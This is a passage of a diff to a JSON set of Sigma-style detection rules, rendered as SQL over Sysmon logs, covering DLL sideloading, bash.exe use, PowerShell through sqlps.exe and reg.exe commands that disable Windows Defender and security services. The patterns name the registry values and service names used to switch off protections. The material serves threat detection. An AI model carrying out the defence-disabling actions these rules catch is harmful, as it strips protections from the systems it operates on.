('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%bash.exe%' ESCAPE '\\' AND CommandLine LIKE '%-c %' ESCAPE '\\') AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR ParentCommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\') OR CommandLine LIKE '%echo /etc/post-install/%.post%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_hw_driver.yml" + "filename": "proc_creation_win_lolbin_bash.yml" }, { - "title": "DLL Sideloading Of DBGHELP.DLL", - "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "title": "Reg Disable Security Service", + "id": "5e95028c-5229-4214-afae-d653d573d0ec", "status": "experimental", - "description": "Detects DLL sideloading of \"dbghelp.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Unknown", + "Other security solution installers" ], 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR 
CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" ], - "filename": "image_load_side_load_dbghelp_dll.yml" + "filename": "proc_creation_win_reg_disable_sec_services.yml" }, { - "title": "Potential System DLL Sideloading From Non System Locations", - "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Detection of PowerShell Execution via Sqlps.exe", + "id": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", + "status": "test", + "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "author": "Agro 
(@agro_sev) oscd.community", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1127" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded 
LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' 
OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE 
'\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE 
'\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded 
